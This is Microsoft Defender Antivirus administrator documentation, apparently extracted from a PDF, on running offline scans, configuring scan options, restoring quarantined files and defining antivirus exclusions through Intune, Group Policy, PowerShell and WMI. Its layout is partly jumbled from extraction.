The following are the hardware requirements for Microsoft Defender Offline Scan in
Windows:
x64 Windows 11
x64/x86 Windows 10
x64/x86 Windows 8.1
x64/x86 Windows 7 Service Pack 1
Ｕ Caution
Microsoft Defender Offline Scan does not apply to:
ARM Windows 11
ARM Windows 10
Windows Server Stock Keeping Units (SKU's)
For more information about Windows 10 and Windows 11 requirements, see the
following topics:
Minimum hardware requirements

Hardware component guidelines
Microsoft Defender Offline updates

To receive Microsoft Defender Offline Scan updates:
Microsoft Defender Antivirus must be primary AV (not in passive mode).

Update MDAV, with however you normally deploy updates to endpoints, a
supported version of the:
Platform Update
Engine Update
Security Intelligence Update
You can manually download and install the latest protection updates from
the Microsoft Malware Protection Center
See the Manage Microsoft Defender Antivirus Security intelligence updates
topic for more information.
User must be logged in with local administrator privileges.
Windows Recovery Environment (WinRE) needs to be enabled.
７ Note
If WinRE is disabled, the WDO scan won't run and no error message is displayed.
Nothing happens even if the machine is restarted manually. To fix this, you only
have to enable WinRE.
To check the WinRE status, you can execute this command-line: reagentc
/info .
If the status is Disabled, you can enable it by executing this command-line:

reagentc /enable .
Usage scenarios
The need to run Microsoft Defender Offline Scan:
If Microsoft Defender Antivirus determines that need to run:
It prompts the user on the endpoint. The prompt can occur via a notification,
similar to the following:
The user will also be notified within the Microsoft Defender Antivirus client or it
can be revealed in Microsoft Intune, if you're using it to manage your Windows
endpoints.
You can manually force an offline scan which is built-in Windows 10, version 1607
or newer, and Windows 11. Or, you can scan through a bootable media for the
older Windows OS'es as described here.
In Configuration Manager, you can identify the status of endpoints by navigating to

Monitoring > Overview > Security > Endpoint Protection Status > System Center
Endpoint Protection Status.
Microsoft Defender Offline scans are indicated under Malware remediation status as
Offline scan required.

Configure notifications
Microsoft Defender Offline notifications are configured in the same policy setting as
other Microsoft Defender Antivirus notifications.
For more information about notifications in Windows Defender, see Configure the
notifications that appear on endpoints.
Run a scan
） Important
Before you use Microsoft Defender Offline Scan, make sure you save any files and
shut down running programs. The Microsoft Defender Offline scan takes about 15
minutes to run. It will restart the endpoint when the scan is complete. The scan is
performed outside of the usual Windows operating environment. The user interface
will appear different to a normal scan performed by Windows Defender. After the
scan is completed, the endpoint will be restarted and Windows will load normally.
You can run a Microsoft Defender Offline scan with the following:
The Windows Security app

PowerShell
Use the Windows Defender Security app to run an offline

scan
Starting with Windows 10, version 1607 or newer, and Windows 11, Microsoft Defender
Offline Scan can be run with one click directly from the Windows Security app. In
previous versions of Windows, a user had to install Microsoft Defender Offline Scan to
bootable media, restart the endpoint, and load the bootable media.
７ Note
In Windows 10, version 1607, the offline scan can be run from Windows Settings >
Update & security > Windows Defender or from the Windows Defender client.
1. Open the Windows Security app:
In the Start menu, select App apps, then select Windows Security, or
In the Start menu, select Settings, then select Privacy & security, and then
select Windows Security, or
In the Search, search for Windows Security, or
In the task bar, select the hidden icons (chevron icon pointing up), click the
Microsoft Defender Antivirus Shield icon.
2. Select Scan options.
3. Select the radio button Microsoft Defender Offline scan and click Scan now.
７ Note
The process starts from C:\ProgramData\Microsoft\Windows Defender\Offline

Scanner.
4. You'll get a prompt to save your work before continuing, similar to the following
image:
After you saved your work, select Scan.

5. Once you clicked on Scan, you'll get another prompt requesting your permission
to make changes to your device, similar to the following image:
Select Yes.
6. Another prompt will appear informing you that you'll be signed out and windows
will shut down in less than a minute, similar to the following image:
7. You'll see that the Microsoft Defender Antivirus scan (offline scan) is in progress.
You'll see the following image:
Use PowerShell cmdlets to run an offline scan

PowerShell
Start-MpWDOScan
Use Windows Management Instruction (WMI) to run an

offline scan
Use the MSFT_MpWDOScan class to run an offline scan.
The following WMI script snippet will immediately run a Microsoft Defender Offline
scan, which will cause the endpoint to restart, run the offline scan, and then restart and
boot into Windows.
Console
wmic /namespace:\\root\Microsoft\Windows\Defender path MSFT_MpWDOScan call

Start
In Windows 7 Service Pack 1 and Windows 8.1:
1. Download Windows Defender Offline and install it to a CD, DVD, or USB flash drive
using the following links:
Download the 64-bit version (msstool64.exe)

Download the 32-bit version (msstool32.exe)
If you're not sure which version to download, see Is my PC running the 32-bit or
64-bit version of Windows? .
2. To get started, find a blank CD, DVD, or USB flash drive with at least 250 MB of free
space, and then run the tool. You'll be guided through the steps to create the
removable media.
 Tip
We recommend you to do the following when downloading Windows

Defender Offline:
Download Windows Defender Offline and create the CD, DVD, or USB
flash drive on a PC that isn't infected with malware as the malware can
interfere with the media creation.
If you use a USB drive, the drive will be reformatted and any data on it
will be erased. Ensure to back up any important data from the drive first.
3. Scan your PC for viruses and other malware.

a. Once you've created the USB drive, CD, or DVD, you'll need to remove it from
your current computer and take it to the computer you want to scan. Insert the
USB drive or disc into the other computer and restart the computer.
b. Boot from the USB drive, CD, or DVD to run the scan. Depending on the
computer's settings, it may automatically boot from the media after you restart
it, or you may have to press a key to enter a "boot devices" menu or modify the
boot order in the computer's UEFI firmware or BIOS.
c. Once you've booted from the device, you'll see a Microsoft Defender tool that
will automatically scan your computer and remove malware.
d. After the scan is complete and you're done with the tool, you can reboot your
computer and remove the Microsoft Defender Offline media to boot back into
Windows.
4. Remove any malware that's found from your PC.

a. If you experience a Stop error on a blue screen when you run the offline scan,
restart your device and try running a Microsoft Defender Offline scan again. If
the blue-screen error happens again, contact Microsoft Support .
Where can I find the scan results?

To see the Microsoft Defender Offline scan results in Windows 10 and Windows 11:
1. Select Start, and then select Settings > Update & Security > Windows Security >
Virus & threat protection.
2. On the Virus & threat protection screen, under Current threats, select Scan
options, and then select Protection history. For more information, see Review
threat detection history in the Windows Security app.
How can I find out if Microsoft Defender Offline scan was

kicked off?
In the Event Viewer, go to Applications and Services Logs > Microsoft > Windows >
Windows Defender > Operational. You'll see:
Log Name: Microsoft-Windows-Windows Defender/Operational

Source: Microsoft-Windows-Windows Defender
Event ID: 2030
Level: Information
Description: Microsoft Defender Antivirus downloaded and configured Microsoft
Defender Antivirus (offline scan) to run on the next reboot.
On older versions than Windows 10, 2004, you'll see:
Windows Defender Antivirus downloaded and configured Windows Defender Offline to

run on the next reboot.
Log Name: Microsoft-Windows-Windows Defender/Operational

Source: Microsoft-Windows-Windows Defender
Event ID: 5007
Level: Information
Description: Microsoft Defender Antivirus Configuration has changed. If this is an
unexpected event, you should review the settings as this may be the result of
malware.
Old value: N/A\Scan\OfflineScanRun =
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Scan\OfflineScanRun
= 0x0
Related articles
Customize, initiate, and review the results of scans and remediation
 Tip
 Tip
Feedback

scanning options
Article • 02/16/2024
Applies to:

Platforms
Windows
Use Microsoft Intune to configure scanning

options
For more information, see Configure device restriction settings in Microsoft Intune and
Microsoft Defender Antivirus device restriction settings for Windows 10 in Intune.
Use Microsoft Configuration Manager to

configure scanning options
For details on configuring Microsoft Configuration Manager (current branch), see How
to create and deploy antimalware policies: Scan settings.
Use Group Policy to configure scanning options
 Tip
Download the Group Policy Reference Spreadsheet, which lists the policy settings
for computer and user configurations that are included in the Administrative
template files delivered with for Windows. You can configure refer to the
spreadsheet when you edit Group Policy Objects.
Here are the most recent versions:

Group Policy Settings Reference Spreadsheet for Windows 10 May 2020
Update (2004)
Group Policy Settings Reference Spreadsheet for Windows 11 October 2021
Update (21H2)
Console.
3. In the Group Policy Management Editor go to Computer configuration and click

4. Expand the tree to Windows components > Microsoft Defender Antivirus, and
then select a location (refer to Settings and locations in this article).
5. Edit the policy object.
6. Click OK, and repeat for any other settings.
Settings and locations
ﾉ Expand table
Policy item and Default PowerShell Set-MpPreference parameter

location setting or WMI property for MSFT_MpPreference class
(if not
configured)
Email scanning Disabled -DisableEmailScanning

Scan > Turn on e-
mail scanning
See Email
scanning
limitations (in this
article)
Script scanning Enabled This policy setting allows you to configure script scanning. If
you enable or do not configure this setting, script scanning is
enabled.
See Defender/AllowScriptScanning
Scan reparse Disabled Not available

points See Reparse points
Scan > Turn on
(if not
configured)
reparse point
scanning
Scan mapped Disabled -DisableScanningMappedNetworkDrivesForFullScan

network drives
Scan > Run full
scan on mapped
network drives
Scan archive files Enabled -DisableArchiveScanning

(such as .zip or
.rar files). The extensions exclusion list will take precedence over this
Scan > Scan setting.
archive files
Scan files on the Enabled -DisableScanningNetworkFiles

network
Scan > Scan
network files
Scan packed Enabled Not available

executables
Scan > Scan Scan packed executables were removed from the following
packed templates:
executables - Administrative Templates (.admx) for Windows 11 2022
Update (22H2)
- Administrative Templates (.admx) for Windows 11 October
2021 Update (21H2)
Scan removable Disabled -DisableRemovableDriveScanning

drives during full
scans only
Scan > Scan
removable drives
Specify the level 0 Not available

of subfolders
within an archive
folder to scan
Scan > Specify
the maximum
depth to scan
archive files
Specify the 50 -ScanAvgCPULoadFactor

maximum CPU
(if not
configured)
load (as a The maximum CPU load is not a hard limit, but is guidance
percentage) for the scanning engine to not exceed the maximum on
during a scan. average. Manual scans ignore this setting and run without
Scan > Specify any CPU limits.
the maximum
percentage of
CPU utilization
during a scan
Specify the No limit Not available

maximum size (in
kilobytes) of The default value of 0 applies no limit
archive files that
should be
scanned.
Scan > Specify
the maximum
size of archive
files to be
scanned
Configure low Disabled Not available

CPU priority for
scheduled scans
Scan > Configure
low CPU priority
for scheduled
scans
７ Note
If real-time protection is turned on, files are scanned before they are accessed and
executed. The scanning scope includes all files, including files on mounted
removable media, such as USB drives. If the device performing the scan has real-
time protection or on-access protection turned on, the scan also includes network
shares.
Use PowerShell to configure scanning options

the following articles:
Manage Microsoft Defender Antivirus with PowerShell cmdlets
Microsoft Defender Antivirus cmdlets
Use WMI to configure scanning options

See Windows Defender WMIv2 APIs.
Email scanning limitations

Email scanning enables scanning of email files used by Outlook and other mail clients
during on-demand and scheduled scans. Embedded objects within email (such as
attachments and archived files) are also scanned. The following file format types can be
scanned and remediated:
DBX
MBX
MIME
PST files used by Outlook 2003 or older (where the archive type is set to non-unicode)
are also scanned, but Microsoft Defender Antivirus cannot remediate threats that are
detected inside PST files.
If Microsoft Defender Antivirus detects a threat inside an email message, the following
information is displayed to assist you in identifying the compromised email so you can
remediate the threat manually:
Email subject
Attachment name
Scanning mapped network drives

On any OS, only the network drives that are mapped at system level, are scanned. User-
level mapped network drives aren't scanned. User-level mapped network drives are
those that a user maps in their session manually and using their own credentials.
 Tip
Feedback

Restore quarantined files in Microsoft
Defender Antivirus
Article • 08/28/2023
Applies to:

Platforms
Windows
Depending on how Microsoft Defender Antivirus is configured, it quarantines suspicious

files. If you're certain a quarantined file isn't a threat, you can restore it on your
Windows device.
1. On your Windows device, open Windows Security.
2. Select Virus & threat protection and then, under Current threats, select Protection
history.
3. If you have a list of items, you can filter on Quarantined Items.
4. Select an item you want to keep, and choose an action, such as Restore.
 Tip
You can also restore a file from quarantine by using Command Prompt. See Restore
file from quarantine.
See also
Configure remediation for scans
Review scan results
 Tip
 Tip
Feedback

Configure custom exclusions for
Article • 01/02/2024
Applies to:

Platforms
Windows
In general, you shouldn't need to define exclusions for Microsoft Defender Antivirus.
However, if necessary, you can exclude files, folders, processes, and process-opened files
from Microsoft Defender Antivirus scans. These types of exclusions are known as custom
exclusions. This article describes how to define custom exclusions for Microsoft
Defender Antivirus with Microsoft Intune and includes links to other resources for more
information.
Custom exclusions apply to scheduled scans, on-demand scans, and always-on real-time
protection and monitoring. Exclusions for process-opened files only apply to real-time
protection.
 Tip
For a detailed overview of suppressions, submissions, and exclusions across

Microsoft Defender Antivirus and Defender for Endpoint, see Exclusions for
Microsoft Defender for Endpoint and Microsoft Defender Antivirus.
Configure and validate exclusions
Ｕ Caution
Use Microsoft Defender Antivirus extensions sparingly. Make sure to review the
information in Manage exclusions for Microsoft Defender for Endpoint and
If you're using Microsoft Intune to manage Microsoft Defender Antivirus or Microsoft
Defender for Endpoint, use the following procedures to define exclusions:
Manage antivirus exclusions in Intune (for existing policies)

Create a new antivirus policy with exclusions in Intune
If you're using another tool, such as Configuration Manager or Group Policy, or you
want more detailed information about custom exclusions, see these articles:
Configure and validate exclusions based on file extension and folder location
Configure exclusions for files opened by processes
Manage antivirus exclusions in Intune (for existing policies)

1. In the Microsoft Intune admin center , choose Endpoint security > Antivirus, and
then select an existing policy. (If you don't have an existing policy, or you want to
create a new policy, skip to Create a new antivirus policy with exclusions in Intune.)
2. Choose Properties, and next to Configuration settings, choose Edit.
3. Expand Microsoft Defender Antivirus Exclusions and then specify your exclusions.
Excluded Extensions are exclusions that you define by file type extension.
These extensions apply to any file name that has the defined extension
without the file path or folder. Separate each file type in the list must be
separated with a | character. For example, lib|obj . For more information,
see ExcludedExtensions.
Excluded Paths are exclusions that you define by their location (path). These
types of exclusions are also known as file and folder exclusions. Separate
each path in the list with a | character. For example, C:\Example|C:\Example1 .
For more information, see ExcludedPaths.
Excluded Processes are exclusions for files that are opened by certain
processes. Separate each file type in the list with a | character. For example,
C:\Example. exe|C:\Example1.exe . These exclusions aren't for the actual
processes. To exclude processes, you can use file and folder exclusions. For
more information, see ExcludedProcesses.
Create a new antivirus policy with exclusions in Intune
1. In the Microsoft Intune admin center , choose Endpoint security > Antivirus > +
Create Policy.
2. Select a platform (such as Windows 10, Windows 11, and Windows Server).
3. For Profile, select Microsoft Defender Antivirus exclusions, and then choose
Create.
4. On the Create profile step, specify a name and description for the profile, and then
choose Next.
5. On the Configuration settings tab, specify your antivirus exclusions, and then
choose Next.
without the file path or folder. Separate each file type in the list with a |
character. For example, lib|obj . For more information, see
ExcludedExtensions.
6. On the Scope tags tab, if you're using scope tags in your organization, specify
scope tags for the policy you're creating. (See Scope tags.)
be applied, and then choose Next. (If you need help with assignments, see Assign
Important points about exclusions

Defining exclusions lowers the protection offered by Microsoft Defender Antivirus. You
should always evaluate the risks that are associated with implementing exclusions, and
you should only exclude files that you're confident aren't malicious.
Exclusions directly affect the ability for Microsoft Defender Antivirus to block, remediate,
or inspect events related to the files, folders, or processes that are added to the
exclusion list. Custom exclusions can affect features that are directly dependent on the
antivirus engine (such as protection against malware, file IOCs, and certificate IOCs).
Process exclusions also affect network protection and attack surface reduction rules.
Specifically, a process exclusion on any platform causes network protection and ASR to
be unable to inspect traffic or enforce rules for that specific process.
Keep the following points in mind when you're defining exclusions:
Exclusions are technically a protection gap. Consider all your options when
defining exclusions. See Submissions, suppressions, and exclusions.
Review exclusions periodically. Recheck and re-enforce mitigations as part of your

review process.
Ideally, avoid defining exclusions in an attempt to be proactive. For example, don't

exclude something just because you think it might be a problem in the future. Use
exclusions only for specific issues, such as those pertaining to performance or
application compatibility that exclusions could mitigate.
Review and audit changes to your list of exclusions. Your security team should
preserve context around why a certain exclusion was added to avoid confusion
later on. Your security team should be able to provide specific answers to
questions about why exclusions exist.
Audit antivirus exclusions on Exchange systems

Microsoft Exchange has supported integration with the Antimalware Scan Interface
(AMSI) since the June 2021 Quarterly Updates for Exchange (see Running Windows
antivirus software on Exchange servers). It's highly recommended to install these
updates and make sure that AMSI is working properly. See Microsoft Defender Antivirus
security intelligence and product updates.
Many organizations exclude the Exchange directories from antivirus scans for
performance reasons. Microsoft recommends auditing Microsoft Defender Antivirus
exclusions on Exchange systems and assessing whether exclusions can be removed
without impacting performance in your environment to ensure the highest level of
protection. Exclusions can be managed by using Group Policy, PowerShell, or systems
management tools like Microsoft Intune.
To audit Microsoft Defender Antivirus exclusions on an Exchange Server, run the Get-
MpPreference command from an elevated PowerShell prompt. (See Get-MpPreference.)
If exclusions can't be removed for the Exchange processes and folders, keep in mind
that running a quick scan in Microsoft Defender Antivirus scans the Exchange directories
and files, regardless of exclusions.
See also
Microsoft Defender Antivirus exclusions on Windows Server 2016 and later
Configure and validate exclusions for Microsoft Defender for Endpoint on Linux
 Tip
Feedback

Configure and validate exclusions based on file extension and
folder location
Article • 06/06/2023
Applies to:

Platforms
Windows
You can define exclusions for Microsoft Defender Antivirus that apply to scheduled scans, on-demand scans, and always-on, real-time
protection and monitoring. Generally, you don't need to apply exclusions. If you do need to apply exclusions, then you can choose from
the following:
Exclusions based on file extensions and folder locations (described in this article)
Exclusions for files that are opened by processes
） Important
Microsoft Defender Antivirus exclusions do apply to some Microsoft Defender for Endpoint capabilities, such as attack surface
reduction rules. Some Microsoft Defender Antivirus exclusions are applicable to some ASR rule exclusions. See Attack surface
reduction rules reference - Microsoft Defender Antivirus exclusions and ASR rules. Files that you exclude using the methods
described in this article can still trigger Endpoint Detection and Response (EDR) alerts and other detections. To exclude files broadly,
add them to the Microsoft Defender for Endpoint custom indicators.
Before you begin

See Recommendations for defining exclusions before defining your exclusion lists.
Exclusion lists
To exclude certain files from Microsoft Defender Antivirus scans, modify your exclusion lists. Microsoft Defender Antivirus includes many
automatic exclusions based on known operating system behaviors and typical management files, such as those used in enterprise
management, database management, and other enterprise scenarios and situations.
７ Note
Exclusions apply to potentially unwanted apps (PUA) detections as well. Automatic exclusions apply only to Windows Server 2016 and
later. These exclusions are not visible in the Windows Security app and in PowerShell.
The following table lists some examples of exclusions based on file extension and folder location.
ﾉ Expand table
Exclusion Examples Exclusion list
Any file with a specific extension All files with the specified extension, anywhere on the machine. Extension exclusions
Valid syntax: .test and test
Any file under a specific folder All files under the c:\test\sample folder File and folder exclusions
A specific file in a specific folder The file c:\sample\sample.test only File and folder exclusions
A specific process The executable file c:\test\process.exe File and folder exclusions
Characteristics of exclusion lists

Folder exclusions apply to all files and folders under that folder, unless the subfolder is a reparse point. Reparse point subfolders must
be excluded separately.
File extensions apply to any file name with the defined extension if a path or folder is not defined.
Important notes about exclusions based on file extensions and folder

locations
Using wildcards such as the asterisk (*) will alter how the exclusion rules are interpreted. See the Use wildcards in the file name and
folder path or extension exclusion lists section for important information about how wildcards work.
Don't exclude mapped network drives. Specify the actual network path.
Folders that are reparse points are created after the Microsoft Defender Antivirus service starts, and those that have been added to
the exclusion list will not be included. Restart the service by restarting Windows for new reparse points to be recognized as a valid
exclusion target.
Exclusions apply to scheduled scans, on-demand scans, and real-time protection, but not across all Defender for Endpoint capabilities.
To define exclusions across Defender for Endpoint, use custom indicators.
By default, local changes made to the lists (by users with administrator privileges, including changes made with PowerShell and WMI)
will be merged with the lists as defined (and deployed) by Group Policy, Configuration Manager, or Intune. The Group Policy lists take
precedence when there are conflicts. In addition, exclusion list changes made with Group Policy are visible in the Windows Security
app.
To allow local changes to override managed deployment settings, configure how locally and globally defined exclusions lists are
merged.
Configure the list of exclusions based on folder name or file extension

You can choose from several methods to define exclusions for Microsoft Defender Antivirus.
Use Intune to configure file name, folder, or file extension exclusions

Configure device restriction settings in Microsoft Intune

Microsoft Defender Antivirus device restriction settings for Windows 10 in Intune
Use Configuration Manager to configure file name, folder, or file extension exclusions
See How to create and deploy antimalware policies: Exclusion settings for details on configuring Microsoft Configuration Manager (current
branch).
Use Group Policy to configure folder or file extension exclusions
７ Note
If you specify a fully qualified path to a file, then only that file is excluded. If a folder is defined in the exclusion, then all files and sub-
directories under that folder are excluded.
1. On your Group Policy management computer, open the Group Policy Management Console, right-click the Group Policy Object you
want to configure, and then select Edit.
2. In the Group Policy Management Editor go to Computer configuration, and select Administrative templates.
3. Expand the tree to Windows components > Microsoft Defender Antivirus > Exclusions.
4. Open the Path Exclusions setting for editing, and add your exclusions.
a. Set the option to Enabled.
b. Under the Options section, select Show.
c. Specify each folder on its own line under the Value name column.
d. If you are specifying a file, ensure that you enter a fully qualified path to the file, including the drive letter, folder path, file name,
and extension.
e. Enter 0 in the Value column.
5. Choose OK.
6. Open the Extension Exclusions setting for editing and add your exclusions.
b. Under the Options section, select Show.
c. Enter each file extension on its own line under the Value name column.
d. Enter 0 in the Value column.
7. Choose OK.
Use PowerShell cmdlets to configure file name, folder, or file extension exclusions
Using PowerShell to add or remove exclusions for files based on the extension, location, or file name requires using a combination of three
cmdlets and appropriate exclusion list parameter. The cmdlets are all in the Defender module.
The format for the cmdlets is as follows:
PowerShell
<cmdlet> -<exclusion list> "<item>"
The following table lists cmdlets that you can use in the <cmdlet> portion of the PowerShell cmdlet:
ﾉ Expand table
Configuration action PowerShell cmdlet
Create or overwrite the list Set-MpPreference
Add to the list Add-MpPreference
Remove item from the list Remove-MpPreference
The following table lists values that you can use in the <exclusion list> portion of the PowerShell cmdlet:
ﾉ Expand table
Exclusion type PowerShell parameter
All files with a specified file extension -ExclusionExtension
All files under a folder (including files in sub-directories), or a specific file -ExclusionPath
） Important
If you have created a list, either with Set-MpPreference or Add-MpPreference , using the Set-MpPreference cmdlet again will overwrite
the existing list.
For example, the following code snippet would cause Microsoft Defender Antivirus scans to exclude any file with the .test file extension:
PowerShell
Add-MpPreference -ExclusionExtension ".test"
 Tip
For more information, see Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus and Defender Antivirus
cmdlets.
Use Windows Management Instrumentation (WMI) to configure file name, folder, or file
extension exclusions
Use the Set, Add, and Remove methods of the MSFT_MpPreference class for the following properties:
WMI
ExclusionExtension
ExclusionPath
Using Set, Add, and Remove is analogous to their counterparts in PowerShell: Set-MpPreference , Add-MpPreference , and Remove-
MpPreference .
 Tip
Use the Windows Security app to configure file name, folder, or file extension exclusions
See Add exclusions in the Windows Security app for instructions.
Use wildcards in the file name and folder path or extension exclusion lists
You can use the asterisk * , question mark ? , or environment variables (such as %ALLUSERSPROFILE% ) as wildcards when defining items in the
file name or folder path exclusion list. The way these wildcards are interpreted differs from their usual usage in other apps and languages.
Make sure to read this section to understand their specific limitations.
） Important
There are key limitations and usage scenarios for these wildcards:
Environment variable usage is limited to machine variables and those applicable to processes running as an NT
AUTHORITY\SYSTEM account.
You can only use a maximum of six wildcards per entry.
You cannot use a wildcard in place of a drive letter.
An asterisk * in a folder exclusion stands in place for a single folder. Use multiple instances of \*\ to indicate multiple nested
folders with unspecified names.
The following table describes how the wildcards can be used and provides some examples.
ﾉ Expand table
Wildcard Examples
* (asterisk) C:\MyData\*.txt includes C:\MyData\notes.txt
In file name and file extension inclusions, the asterisk replaces any C:\somepath\*\Data includes any file in C:\somepath\Archives\Data and its
number of characters, and only applies to files in the last folder defined in subfolders, and C:\somepath\Authorized\Data and its subfolders
the argument.
C:\Serv\*\*\Backup includes any file in C:\Serv\Primary\Denied\Backup and its
In folder exclusions, the asterisk replaces a single folder. Use multiple * subfolders, and C:\Serv\Secondary\Allowed\Backup and its subfolders
with folder slashes \ to indicate multiple nested folders. After matching
the number of wild carded and named folders, all subfolders are also
included.
? (question mark) C:\MyData\my?.zip includes C:\MyData\my1.zip
In file name and file extension inclusions, the question mark replaces a C:\somepath\?\Data includes any file in C:\somepath\P\Data and its subfolders
single character, and only applies to files in the last folder defined in the
argument. C:\somepath\test0?\Data would include any file in C:\somepath\test01\Data
and its subfolders
In folder exclusions, the question mark replaces a single character in a
folder name. After matching the number of wild carded and named
folders, all subfolders are also included.
Wildcard Examples
Environment variables %ALLUSERSPROFILE%\CustomLogFiles would include

The defined variable is populated as a path when the exclusion is C:\ProgramData\CustomLogFiles\Folder1\file1.txt
evaluated.
） Important
If you mix a file exclusion argument with a folder exclusion argument, the rules will stop at the file argument match in the matched
folder, and will not look for file matches in any subfolders. For example, you can exclude all files that start with "date" in the folders
c:\data\final\marked and c:\data\review\marked by using the rule argument c:\data\*\marked\date* . This argument, however, will
not match any files in subfolders under c:\data\final\marked or c:\data\review\marked .
System environment variables

The following table lists and describes the system account environment variables.
ﾉ Expand table
This system environment variable... Redirects to this
%APPDATA% C:\Windows\system32\config\systemprofile\Appdata\Roaming
%APPDATA%\Microsoft\Internet Explorer\Quick Launch C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Internet Explorer\Quick Laun
%APPDATA%\Microsoft\Windows\Start Menu C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu
%APPDATA%\Microsoft\Windows\Start Menu\Programs C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
%LOCALAPPDATA% C:\WINDOWS\system32\config\systemprofile\AppData\Local
%ProgramData% C:\ProgramData
%ProgramFiles% C:\Program Files
%ProgramFiles%\Common Files C:\Program Files\Common Files
%ProgramFiles%\Windows Sidebar\Gadgets C:\Program Files\Windows Sidebar\Gadgets
%ProgramFiles%\Common Files C:\Program Files\Common Files
%ProgramFiles(x86)% C:\Program Files (x86)
%ProgramFiles(x86)%\Common Files C:\Program Files (x86)\Common Files
%SystemDrive% C:
%SystemDrive%\Program Files C:\Program Files
%SystemDrive%\Program Files (x86) C:\Program Files (x86)
%SystemDrive%\Users C:\Users
%SystemDrive%\Users\Public C:\Users\Public
%SystemRoot% C:\Windows
%windir% C:\Windows
%windir%\Fonts C:\Windows\Fonts
%windir%\Resources C:\Windows\Resources
%windir%\resources\0409 C:\Windows\resources\0409
%windir%\system32 C:\Windows\System32
%ALLUSERSPROFILE% C:\ProgramData
%ALLUSERSPROFILE%\Application Data C:\ProgramData\Application Data
%ALLUSERSPROFILE%\Documents C:\ProgramData\Documents
%ALLUSERSPROFILE%\Documents\My Music\Sample Music C:\ProgramData\Documents\My Music\Sample Music

This system environment variable... Redirects to this
%ALLUSERSPROFILE%\Documents\My Music C:\ProgramData\Documents\My Music
%ALLUSERSPROFILE%\Documents\My Pictures C:\ProgramData\Documents\My Pictures
%ALLUSERSPROFILE%\Documents\My Pictures\Sample Pictures C:\ProgramData\Documents\My Pictures\Sample Pictures
%ALLUSERSPROFILE%\Documents\My Videos C:\ProgramData\Documents\My Videos
%ALLUSERSPROFILE%\Microsoft\Windows\DeviceMetadataStore C:\ProgramData\Microsoft\Windows\DeviceMetadataStore
%ALLUSERSPROFILE%\Microsoft\Windows\GameExplorer C:\ProgramData\Microsoft\Windows\GameExplorer
%ALLUSERSPROFILE%\Microsoft\Windows\Ringtones C:\ProgramData\Microsoft\Windows\Ringtones
%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu C:\ProgramData\Microsoft\Windows\Start Menu
%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs C:\ProgramData\Microsoft\Windows\Start Menu\Programs
%ALLUSERSPROFILE%\Microsoft\Windows\Start C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools

Menu\Programs\Administrative Tools
%ALLUSERSPROFILE%\Microsoft\Windows\Start C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp

Menu\Programs\StartUp
%ALLUSERSPROFILE%\Microsoft\Windows\Templates C:\ProgramData\Microsoft\Windows\Templates
%ALLUSERSPROFILE%\Start Menu C:\ProgramData\Start Menu
%ALLUSERSPROFILE%\Start Menu\Programs C:\ProgramData\Start Menu\Programs
%ALLUSERSPROFILE%\Start Menu\Programs\Administrative Tools C:\ProgramData\Start Menu\Programs\Administrative Tools
%ALLUSERSPROFILE%\Templates C:\ProgramData\Templates
%LOCALAPPDATA%\Microsoft\Windows\ConnectedSearch\Templates C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\ConnectedSearch\Templa
%LOCALAPPDATA%\Microsoft\Windows\History C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\History
%PUBLIC% C:\Users\Public
%PUBLIC%\AccountPictures C:\Users\Public\AccountPictures
%PUBLIC%\Desktop C:\Users\Public\Desktop
%PUBLIC%\Documents C:\Users\Public\Documents
%PUBLIC%\Downloads C:\Users\Public\Downloads
%PUBLIC%\Music\Sample Music C:\Users\Public\Music\Sample Music
%PUBLIC%\Music\Sample Playlists C:\Users\Public\Music\Sample Playlists
%PUBLIC%\Pictures\Sample Pictures C:\Users\Public\Pictures\Sample Pictures
%PUBLIC%\RecordedTV.library-ms C:\Users\Public\RecordedTV.library-ms
%PUBLIC%\Videos C:\Users\Public\Videos
%PUBLIC%\Videos\Sample Videos C:\Users\Public\Videos\Sample Videos
%USERPROFILE% C:\Windows\system32\config\systemprofile
%USERPROFILE%\AppData\Local C:\Windows\system32\config\systemprofile\AppData\Local
%USERPROFILE%\AppData\LocalLow C:\Windows\system32\config\systemprofile\AppData\LocalLow
%USERPROFILE%\AppData\Roaming C:\Windows\system32\config\systemprofile\AppData\Roaming
Review the list of exclusions

You can retrieve the items in the exclusion list by using one of the following methods:
Intune
MpCmdRun
PowerShell
） Important
Exclusion list changes made with Group Policy will show in the lists of Windows Security app. Changes made in the Windows Security
app will not show in the Group Policy lists.
If you use PowerShell, you can retrieve the list in the following two ways:
Retrieve the status of all Microsoft Defender Antivirus preferences. Each list is displayed on separate lines, but the items within each
list are combined into the same line.
Write the status of all preferences to a variable, and use that variable to only call the specific list you are interested in. Each use of
Add-MpPreference is written to a new line.
Validate the exclusion list by using MpCmdRun

To check exclusions with the dedicated command-line tool mpcmdrun.exe, use the following command:
Console

cd "%programdata%\microsoft\windows defender\platform"
cd 4.18.2111-5.0 (Where 4.18.2111-5.0 is this month's Microsoft Defender Antivirus "Platform Update".)
MpCmdRun.exe -CheckExclusion -path <path>
７ Note
Checking exclusions with MpCmdRun requires Microsoft Defender Antivirus CAMP version 4.18.2111-5.0 (released in December 2021)
or later.
Review the list of exclusions alongside all other Microsoft Defender Antivirus preferences
by using PowerShell
PowerShell
Get-MpPreference
In the following example, the items contained in the ExclusionExtension list are highlighted:
For more information, see Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus and Defender Antivirus cmdlets.
Retrieve a specific exclusions list by using PowerShell

Use the following code snippet (enter each line as a separate command); replace WDAVprefs with whatever label you want to name the
variable:
PowerShell
$WDAVprefs = Get-MpPreference
$WDAVprefs.ExclusionExtension
$WDAVprefs.ExclusionPath
In the following example, the list is split into new lines for each use of the Add-MpPreference cmdlet:

For more information, see Use PowerShell cmdlets to configure and run Microsoft Defender Antivirus and Defender Antivirus cmdlets.

You can validate that your exclusion lists are working by using PowerShell with either the Invoke-WebRequest cmdlet or the .NET WebClient
class to download a test file.
In the following PowerShell snippet, replace test.txt with a file that conforms to your exclusion rules. For example, if you have excluded
